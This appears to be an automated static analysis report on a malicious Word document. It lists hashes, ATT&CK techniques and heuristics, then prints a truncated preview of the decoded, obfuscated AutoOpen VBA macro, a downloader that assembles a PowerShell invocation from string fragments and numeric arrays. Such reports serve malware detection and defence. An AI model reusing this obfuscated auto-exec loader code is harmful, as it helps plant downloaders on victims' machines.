Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8ef87a2a01bdb5da…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 233.8 KB
Created: 2018-07-06 23:20:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 6c79bd7cbb7719b4264e2d5392ff4ada
SHA-1: 4368bc4d0cf54ec59674d3dad6fbc38725ccd3cc
SHA-256: 8ef87a2a01bdb5da35e33fd2280d1331196df02bb6f724756fa262dbdda3b348
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader. The AutoOpen macro uses CreateObject and Shell() calls, which are often used to download and execute further stages. The script attempts to construct a PowerShell command, likely to download a second-stage payload, and the presence of a Run key suggests persistence. The overall pattern points to a macro-based downloader.

Heuristics (8)

  • OLE_VBA_MACROS (medium, 5 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER (critical): Obfuscated auto-exec VBA loader
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16824 bytes
SHA-256: 769fea5ef1adac3fe0d87f01df06952533a5d26eebe1447bd10fc351f1164b0a
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "RoRObvBKJjqLPh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   sLJWi = zPfia / BPQiVt * BomiHQ - uTPNI + 4809 - EMmYzi / 75022 - EQBKp
   jFMPbH = alOQUi / EXEaF * BOEmvR - phdBTs + 87716 - azVikq / 79191 - kbTKs
   frVOU = QpCvR / hOrCh * wdsBR - NEwhT + 18729 - QTvfk / 73065 - WfOisO
   zhYiiV = ZUJYI / IMwbod * YjrVnM - TKcHr + 82610 - iUvKPQ / 49301 - BYLiw
   fIzXv = GcBFa / dzRVX * wDdJY - DjkWh + 93808 - dnFjEJ / 58855 - lGKWrE
   EwfmVi = kWklT / ikuFi * jYPMMt - KzTmjJ + 77120 - jXCJFw / 69109 - NUXKS
jqBfzPbjwfUXfn (OhwctIkkaRz + izoCt + IruUzWcjI)
   RNHjQ = lStjTF / jDbfS * MsvZw - ECsoiW + 15710 - DVTBId / 83101 - jQYfdC
   rGEOT = pOhWHK / iOrmqK * NSkHn - NhQDh + 91809 - GjBal / 98980 - MKtWw
   wizAJ = WnJjM / tdLJLi * OjZXp - aIiAT + 42220 - YasDW / 15539 - jwjsc
End Sub


Attribute VB_Name = "iRGtCRGrY"
Function OhwctIkkaRz()
On Error Resume Next
zinRM = 87847 / sDADDj * 53406 - 51557 / 17361 * zJBUBp / KVrXmR - wMniB - (zzifw / 30683 / JCAsIj + qEjrv - (uHqCWF + sErwwZ))
   auGjka = 70890 / RKIwM * 362 - 34655 / 35399 * tXcCGW / iUknG - pNNdB - (pzkzuY / 6074 / wrhwn + CTvIj - (XjzPq + IEVulj))
   dbJaid = 7050 / YqnmA * 91562 - 19344 / 42291 * EuhRF / UGzQw - DGwzKh - (JVaGPF / 22395 / cDzMu + cjpQLX - (pTlNF + UjpmpN))
CBcsRZ = "wershell" + "         " + "       " + "   &" + Chr(40) + Chr(40) + "geT-" + "vARiA" + "BLe '" + "*MDr*'" + Chr(41) + "." + "NAme[3,1" + "1,2]-JOi" + "n''" + Chr(41) + Chr(40) + "-" + "JOIn"
iViSj = 88819 / lCtrt * 44740 - 42623 / 37897 * jsAFY / VdjMFj - ATrsrs - (sMQsCP / 42597 / SNWrH + nizilp - (EiToio + azAjd))
   njAwdz = 8065 / jSHOZk * 31185 - 74289 / 27938 * tIWJmN / daniZY - odOpna - (OmoqG / 36926 / sXtrj + XUaiw - (UAYQKG + NavWaz))
   fWXlEj = 16144 / wOGNR * 89992 - 60990 / 90969 * MGrIbI / dsFLEv - YUqYKU - (kLzWD / 14395 / YaJLAN + BsqEN - (IMizQC + htaWVb))
   usmXBs = 9922 / vzDiW * 44695 - 54203 / 611 * woBYh / FAbRf - npZnlG - (DjMnCu / 66288 / MUJKQa + ZnYCN - (hWZaZR + KdvkQ))
DPsKEB = Chr(40) + Chr(40) + "14," + " 76, 69 " + ", 127," + "23, 68" + ", 79 ,93" + ", 7, 69," + " 72,64"
jrNMZB = 6378 / UQwOn * 3336 - 25988 / 10801 * fPibhQ / YXQiub - RRjckq - (IhHpa / 94364 / nKabsL + CMPCbn - (BkZNsl + zEZcOs))
   cHDJT = 96964 / WpNcE * 26240 - 71373 / 85333 * FDwod / DTaUzS - qOlhP - (rfcWB / 86740 / iaFko + HraaWW - (fEjizB + JwzqWw))
   dchzv = 32270 / dNqfI * 21965 - 42008 / 30648 * PKVanv / WAADfa - NqJGN - (sYbdNa / 42871 / TsjniM + LcENhi - (zuNmC + cpwEIR))
pJqNmAwjsps = " , 79 ,73" + " ,94, " + "10 ,10" + "0,79" + ", 94" + " ,4 ,12"
lHTjlN = 79972 / BQBOE * 38529 - 50825 / 17291 * NGzhc / LKpGBz - TFVliu - (DCovX / 21998 / jRtkwT + iQktJ - (HZwGo + XwwsT))
   AALRBK = 32900 / ctwWC * 60656 - 35976 / 79349 * lrUVBi / hHUnf - YZuTTL - (ziisT / 60011 / zklXFH + HbVJw - (Fkuqd + pUWcjM))
plnuUI = "5 , 79" + ", 72," + "105,70," + "67 ,79" + " , 68 , " + "94 , "
mikfwC = 92423 / NqCCb * 31934 - 29298 / 39444 * DSBSs / jpPPOC - wcdbmv - (YwjwS / 91565 / HaIAvN + RLjbuF - (phmhJ + uaZAdT))
   DJcCWw = 12285 / VwiYfR * 96085 - 47994 / 18242 * pNPnr / sqKcI - LzkSD - (sHcXz / 74280 / tuBJD + DZrSI - (PROJjo + pTllnN))
   jCsROc = 27752 / TrjHEE * 53886 - 38560 / 59145 * roBizw / VzFIJO - qtWXzA - (zBTuSz / 63513 / krRGL + ZiCEv - (sfJpKc + RKhEUd))
ZmZdQ = "17 ," + "14, 65, " + "104, 120" + " , 23 , " + "13,66,9" + "4,94" + " ,90,16" + " , 5 ,5 " + ", 93 , "
jbiMAj = 89216 / FTlVi * 71345 - 54317 / 11027 * dnUzZ / faIBo - RiJPGU - (NzfEc / 93537 / iiYAO + lzktY - (JWzmsh + YopcF))
   mEzwi = 54515 / HPTpC * 59440 - 32947 / 93090 * sqRjRu / JVEhA - WcKqN - (cbzbY / 50677 / WNTXPJ + AlckLm - (oqaZvP + triMRr))
   uPtIr = 44980 / pwpXX * 16268 - 70440 / 98422 * iahnkW / cLbdW - KzRJbr - (qCvUn / 2834 / kXsqIs + irKjo - (NRzPt + znrGNh))
MEBJhYpP = "93 ,93 ,4" + " ,
... (truncated)